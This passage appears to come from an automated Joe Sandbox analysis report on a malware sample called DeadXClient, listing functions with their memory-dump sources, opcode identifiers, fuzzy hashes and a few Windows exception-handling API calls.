                                                                                                                                                                                  • Instruction Fuzzy Hash: 64412821B1DA8A0FF7A9A6BC446A6793BD2EFC7311B0900FAD44DC3297DC5CAC429341
                                                                                                                                                                                  Function 00007FFD344F0760 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d4038b6b0546491ffde3bcc54100d602ee0e531b286941cf2d20bfbeb479e7d4
                                                                                                                                                                                  • Instruction ID: 808a597974acc0fd0685651c431ff433f83746392bfe0505dd8d2ec24e2b2e6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d4038b6b0546491ffde3bcc54100d602ee0e531b286941cf2d20bfbeb479e7d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: A0415974A08A1D8FEB98EB68D4A5BB977E0FF66311F40017ED00AD3691DA76A8418B41
                                                                                                                                                                                  Function 00007FFD344F8C11 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 353e848c06e96a1eddff4276d80dbae2f0160822a9fb4427dcd2393a1333b143
                                                                                                                                                                                  • Instruction ID: 27c2d618a09edbac063ebdc3324f087aed215a6e0b847abdb3fa85c2e9493d51
                                                                                                                                                                                  • Opcode Fuzzy Hash: 353e848c06e96a1eddff4276d80dbae2f0160822a9fb4427dcd2393a1333b143
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB41C232B09A4D8FEB94EB6894A96FD77E1FF59300B0501BAD40DD7292EF3C98418751
                                                                                                                                                                                  Function 00007FFD344F06F0 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e114871f08c66388c3b9fec313d61cf0a3b8b8e03d958eb4017aa3ce345ea09c
                                                                                                                                                                                  • Instruction ID: ac578803b13655bb126d88fb0c34b62bf9280958748ecbf2891c7c59947631c1
                                                                                                                                                                                  • Opcode Fuzzy Hash: e114871f08c66388c3b9fec313d61cf0a3b8b8e03d958eb4017aa3ce345ea09c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0541C231F0894A8FEB98EB6880B56B977E1FF99310F15017DD01ED32C6DE6EA8419741
                                                                                                                                                                                  Function 00007FFD344F04C8 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4b891957a411ccd5203f6a59c3e5ce65d1ee973f8361146b1ae09eacdf1b4aea
                                                                                                                                                                                  • Instruction ID: 82d501dcc7f769f7d4adb8f3d496ba60e9e65a6156b16858dfa460b446348875
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b891957a411ccd5203f6a59c3e5ce65d1ee973f8361146b1ae09eacdf1b4aea
                                                                                                                                                                                  • Instruction Fuzzy Hash: C231C721B1C9490FE7A8EB6C946A779B7C2EF99311F0505BEE04EC3297DDA9AC418341
                                                                                                                                                                                  Function 00007FFD344F0A91 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: baffaf4a4023f6f11cc49f203fd4b63a82f0498babeb8046a4798d5d3d44afc9
                                                                                                                                                                                  • Instruction ID: 27359ce8e72043c12034fa3911d818e610fcf61aee47d2fd690a135f0aadfd9e
                                                                                                                                                                                  • Opcode Fuzzy Hash: baffaf4a4023f6f11cc49f203fd4b63a82f0498babeb8046a4798d5d3d44afc9
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE31A312B1894A5FEB54BBBC58693BD77D6EFD9311F0502BAE40CC3297DE5868018352
                                                                                                                                                                                  Function 00007FFD344F0AB0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 546aa8a0fc084bddcbab720a772ef353b848d6721d6e6d7c443a66c6d1977c22
                                                                                                                                                                                  • Instruction ID: f9cc348f3f89ebe525bb4669c415176688339ac943cc6c455ef7f7db43a4496d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 546aa8a0fc084bddcbab720a772ef353b848d6721d6e6d7c443a66c6d1977c22
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B31A412F2890A5BFB94BBBC58693BD67D6EFD9702F44027AE40DC32D6DD5868014392
                                                                                                                                                                                  Function 00007FFD344F0949 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 31a46d1f4e190ddc8ca5d0284dd88063abb5e25f4003cb17a83802c2e0fad87d
                                                                                                                                                                                  • Instruction ID: 998fd39e98ca85b16c54076737b00c941145685fe21740ce0beb6d0b4ba5ddc9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31a46d1f4e190ddc8ca5d0284dd88063abb5e25f4003cb17a83802c2e0fad87d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8319E71B58A4A9FEB54FBA8C8A57F97BB1FF98300F900479D009D3386DE7868018750
                                                                                                                                                                                  Function 00007FFD344F9F45 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7a856d4d34b0307f105be0f4dcf07cd109e6ea201eee798a654e4354f7af9e59
                                                                                                                                                                                  • Instruction ID: e516295fd018af281aa69652c43b71b3f694a0d2a7651f6bf1c7af71a09bc4f3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a856d4d34b0307f105be0f4dcf07cd109e6ea201eee798a654e4354f7af9e59
                                                                                                                                                                                  • Instruction Fuzzy Hash: D531813150D7488FDB55DFA8D885AEABBF0FF56320F0482AFD049C7552D764A805CB51
                                                                                                                                                                                  Function 00007FFD344F8AD9 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0261f20686995a4070ef12af179b8ef08fd52559b45ebc5b6989b06a656d634e
                                                                                                                                                                                  • Instruction ID: b99a5777c74c116bf8ba0e1c36c83e0482d26cd1fb9ab44164609d3bf6659531
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0261f20686995a4070ef12af179b8ef08fd52559b45ebc5b6989b06a656d634e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2431E27171CA898FEB96EB38C8A65797BE0FF56301B4501BAD048C7296CF78A841C741
                                                                                                                                                                                  Function 00007FFD344F3443 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e10f1f3191ec5133f340d32fe8943ecf3bddffe14ea93edd0643b530db6d57d3
                                                                                                                                                                                  • Instruction ID: 06c2285bdf858f99a0b780a3c4e2f05f5b0dd159e734543de9d20cf3010ee672
                                                                                                                                                                                  • Opcode Fuzzy Hash: e10f1f3191ec5133f340d32fe8943ecf3bddffe14ea93edd0643b530db6d57d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F210A63B1C9550FF7A9A66C54762F977C2EFC9250B44067ED18FD32CAED5CA8024381
                                                                                                                                                                                  Function 00007FFD344F9E69 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8583c48794e3ff1efa577a6512bb1ef5e729998bff59aa5d798cc776b1c3ed72
                                                                                                                                                                                  • Instruction ID: 6fa70bfd71d34cbe2a4764447c2d4b09a015506ffd7d6104333ef516a8f29c13
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8583c48794e3ff1efa577a6512bb1ef5e729998bff59aa5d798cc776b1c3ed72
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34215732B4D6CA0FE746976448615F67BE1EF8B310F0541BAD28EC31D6CD6C9842D751
                                                                                                                                                                                  Function 00007FFD344F9D51 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7f9297b083c8c637170820cdd622ce39f490bbc9b56e29a51adc85360c93c943
                                                                                                                                                                                  • Instruction ID: b6cd833c9682d3b09a1aeb05af032e20f5420d7db3b56ddf41032322fd7a07c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f9297b083c8c637170820cdd622ce39f490bbc9b56e29a51adc85360c93c943
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0321F010B5CA998BEB56B3AC98B63B977D1EF49300F5501B9E00CC32C7DD6CA8008792
                                                                                                                                                                                  Function 00007FFD344F0770 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e566fe764558eaf860be9ddb3b4deb3e3f7dec6aaec9b31d01f1ec31f411647f
                                                                                                                                                                                  • Instruction ID: 704ec170d8cc5c005545730bcd8ca835902a947de07de5ab68ab0226f9193a3a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e566fe764558eaf860be9ddb3b4deb3e3f7dec6aaec9b31d01f1ec31f411647f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8111C110B689199BFB55F7AC94A67BA73D6EF49700F510579E00CC32C7DE6CA8008B92
                                                                                                                                                                                  Function 00007FFD344F8650 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9ad05ebd12f333a40d13b110e271bd6b4a5ef6c8982b04b0b0478386d7845525
                                                                                                                                                                                  • Instruction ID: a5693697fcf686177fd7f9ee52475022e9403a518d74ee25d754370714b1e724
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ad05ebd12f333a40d13b110e271bd6b4a5ef6c8982b04b0b0478386d7845525
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13110432B08A894FFB52E76898A65FD7BE1FF5A310F0501B2E50CC7296DE586C114382
                                                                                                                                                                                  Function 00007FFD344F1951 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2abbd2ff43914b723ee0461c24b9c7605ad53c66bcfb20a57214e3e7c181d2c4
                                                                                                                                                                                  • Instruction ID: 3b42add12f583997b39fda2b18b33642dab1b5a0d4a153c33f8c5e03e8cd3802
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2abbd2ff43914b723ee0461c24b9c7605ad53c66bcfb20a57214e3e7c181d2c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD017B12E0DB850FE345A63C58B55717FE0DFD7650B4804BBE488C619BEC4C6D40C392
                                                                                                                                                                                  Function 00007FFD344F1DDA Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a47384b61f47bf0bd90caae6a682973512a8402f1535a1d7610b825183bde0ca
                                                                                                                                                                                  • Instruction ID: 48f066c2f10fc76dd6de0de4cc4e43e446b2ef81f9925add33bbb3c8cb21ae4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: a47384b61f47bf0bd90caae6a682973512a8402f1535a1d7610b825183bde0ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01AD72E0891E4BEF54BBA8845A1FE77F1FF59311F00027AD50DD2185DE7869008781
                                                                                                                                                                                  Function 00007FFD344F2311 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1126906035198de4d470985ec19dc10cfdaa364a2f354f13e32bddc5deed8edd
                                                                                                                                                                                  • Instruction ID: 5aa160005f82fce3829f0d1cad5b78f4477c65a10776ca4c8ed1784987cf1412
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1126906035198de4d470985ec19dc10cfdaa364a2f354f13e32bddc5deed8edd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 29F05E6289E3C91FD70357705C355E67FB4AF43100B0E41EBE588CB0A7DA1D65199363
                                                                                                                                                                                  Function 00007FFD344F1DE0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 76eee9534e2b0675affe4b2857b2fbdaea75e17ab4574a812234f24c2729823b
                                                                                                                                                                                  • Instruction ID: 3d18cf3b0b41cd0af85b4ac0a967952919ce3de53d02089e204aaed4980c3540
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76eee9534e2b0675affe4b2857b2fbdaea75e17ab4574a812234f24c2729823b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F08C72E1491E8BEB50BBA8845A1FE77F1EF58302F00026BE40DD2255DE3469408781
                                                                                                                                                                                  Function 00007FFD344F260D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 953ecd11a669c00a7a1f2e1948a242fc193f864197f5cb8de8ee6b5be438d852
                                                                                                                                                                                  • Instruction ID: 9e07ffbfc82c7307ea241fe06471863ccfeafa6aa9989863280b39b9945adb19
                                                                                                                                                                                  • Opcode Fuzzy Hash: 953ecd11a669c00a7a1f2e1948a242fc193f864197f5cb8de8ee6b5be438d852
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5201D102F0C6460BFB65767848B62B92B81EF86310F4500B9E24DC21D7EEAE68429341
                                                                                                                                                                                  Function 00007FFD344F0775 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: daa77cf359383cf4449919a8dcbf979bbf93ca7cad4a98737fc8ef89c2a99f3d
                                                                                                                                                                                  • Instruction ID: 818dfad417aea3c1bd46ef29c4ab0af3bf8758bd356d6b9b735814a87faab523
                                                                                                                                                                                  • Opcode Fuzzy Hash: daa77cf359383cf4449919a8dcbf979bbf93ca7cad4a98737fc8ef89c2a99f3d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB09202F6E846409504327948A20A8BBA09F8B120FD604F0D588C808A988D28966A82
                                                                                                                                                                                  Function 00007FFD344F24A0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3d5db550849b09e0ded0442fffbbf82b30129ba6ef9ab1371ac793b4fcee9e34
                                                                                                                                                                                  • Instruction ID: d2a033179048d318c767659061ce961dfcd8e0aef6a70760e8ffebc5404ac5c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d5db550849b09e0ded0442fffbbf82b30129ba6ef9ab1371ac793b4fcee9e34
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCA00205D9784F01984871BE1DD70B474505FCB118FC62170E90CD458AE8CE65E91297

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 1C5981B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32 ref: 1C5981CC
                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C5981F9
                                                                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C598213
                                                                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C598254
                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C5982A8
                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C5982C9
                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C5982D4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                                                                                                                                                  • Instruction ID: c3d2fea52230d97fad45fe3ffb288519cdfcceddd6d195eab97b8e468d4496f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98313C76205F80CAEB608F61E850BDE7375F798748F44452ADA4E47B99EF78C248C714
                                                                                                                                                                                  Function 1C59B62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C59B6A5
                                                                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C59B6BD
                                                                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C59B6F8
                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C59B731
                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C59B73B
                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C59B746
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                  • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                                                                                                                                                  • Instruction ID: c9d1b6d360b5e2f3b4bc734c37b91b56c749f971733ea635e81c94ca8f221573
